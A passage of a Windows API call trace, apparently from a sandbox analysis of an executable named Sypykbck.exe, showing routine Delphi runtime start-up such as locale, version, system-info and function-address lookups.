pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x139a680, pcchLanguagesBuffer=0x12d768) returned 1 [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.754] GetUserDefaultUILanguage () returned 0x409 [0100.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0100.756] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.756] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0100.756] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2344d0 [0100.756] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0100.756] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0100.756] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.756] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13680dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0100.756] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0100.756] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] GetThreadLocale () returned 0x409 [0100.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0100.757] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0100.757] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.757] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0100.757] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0100.757] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2344e0 [0100.757] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0100.757] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0100.757] GetLastError () returned 0x7a [0100.757] GetLogicalProcessorInformation (in: Buffer=0x13599d0, ReturnedLength=0x12fab0 | out: Buffer=0x13599d0, ReturnedLength=0x12fab0) returned 1 [0100.757] GetCurrentThreadId () returned 0xc44 [0100.757] GetCurrentThreadId () returned 0xc44 [0100.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0100.757] GetThreadLocale () returned 0x409 [0100.757] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0100.757] GetThreadLocale () returned 0x409 [0100.758] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0100.758] GetCurrentThreadId () returned 0xc44 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0100.759] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0100.760] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0100.760] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0100.760] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0100.760] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15754919435) returned 1 [0100.760] GetTickCount () returned 0x24134 [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xe, wMilliseconds=0xd6)) [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xe, wMilliseconds=0xd6)) [0100.760] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15754933087) returned 1 [0100.760] GetTickCount () returned 0x24134 [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xe, wMilliseconds=0xd6)) [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xe, wMilliseconds=0xd6)) [0100.760] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13682bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0100.760] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x135288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0100.760] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13682bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0100.761] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13682bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0100.761] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13682bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0100.761] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13682bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0100.761] GetProcAddress (hModule=0x76750000, 